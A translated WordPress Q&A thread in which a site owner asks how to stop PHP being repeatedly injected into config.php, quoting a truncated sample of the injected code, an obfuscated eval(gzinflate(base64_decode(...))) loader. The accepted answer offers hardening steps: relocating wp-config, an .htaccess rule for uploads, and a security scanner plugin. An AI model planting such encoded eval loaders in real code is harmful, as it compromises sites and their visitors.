删除被黑客攻击的想法!
删除被黑客攻击的想法!
提问于 2014-01-06 18:58:36
我一直在做一个项目,它不断地将一些PHP插入到config.php文件中,这会导致许多SEO问题。在这个介绍之后,我会把它的样本粘贴进去(很长)。我已经删除了它几次,更改了FTP密码,管理密码和用户名,盐类,并检查了.htaccess -除此之外,我是卡住了。知道怎么解决这个问题吗?
部分代码,中间减少了很多;
eval(gzinflate(base64_decode('pRn9c9o49ufczP0PKuPGuHHAGAihiZN2U7q7M9dtj6Y3c5OkjLBl8GJsr2wINM7/fu9J8kcI2dub67RI1vvU+5KeGvik+cwloQZZf1zzedt1ZZlcpyBPJMvX2pG1Dprepar9axCdwIH0gE+bythF4QS5moVpGq9H/ZZomjWCjjmNihq1vs40FxskklHEdv6/jmX36VOulSG/Bj9Z9GL3mKPHODawgnPPcBAheCc+qFKjBe8n3aMImMpEvSteAiXZR/ovb0UMgrDAs8IXtyOPNwPy2Yyf9vqj027LHnfzEoKLIbhMjdKE6juoGrE7goKguDPBX4+B8=')));回答 1
WordPress Development用户
回答已采纳
发布于 2014-01-06 21:12:55
您可以将wp-config文件向上移动一级。
您还可以创建一个.htaccess文件并使用以下代码将其上传到上载文件夹:
<Files ~ ".*..*">
Order Allow,Deny
Deny from all
</Files>
<FilesMatch ".(jpg|jpeg|jpe|gif|png)$">
Order Deny,Allow
Allow from all
</FilesMatch>或者安装一个安全插件,这也可以扫描您的安装,这样您就可以更容易地找到恶意代码。http://wordpress.org/plugins/wordfence/
更安全。http://codex.wordpress.org/Hardening_WordPress
页面原文内容由WordPress Development提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://wordpress.stackexchange.com/questions/128780
复制相关文章
相似问题
腾讯云开发者
